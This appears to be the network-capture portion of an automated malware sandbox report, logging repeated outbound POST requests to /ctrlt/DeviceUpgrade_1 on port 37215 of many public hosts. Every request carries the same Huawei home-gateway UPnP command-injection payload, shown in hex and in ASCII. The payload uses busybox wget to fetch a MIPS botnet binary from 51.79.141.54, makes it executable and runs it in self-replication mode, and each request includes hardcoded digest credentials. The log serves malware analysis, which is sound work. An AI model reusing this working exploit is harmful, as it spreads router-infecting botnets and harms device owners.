                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    25192.168.2.146050841.70.199.12137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.105619907 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.500138998 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    26192.168.2.1436266157.10.89.6437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.106719971 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.466916084 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    27192.168.2.1449990197.242.248.23837215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.106719971 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.466916084 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    28192.168.2.143422441.254.159.20637215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.107054949 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.463337898 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    29192.168.2.1449440197.45.3.4437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.107054949 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.469392061 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
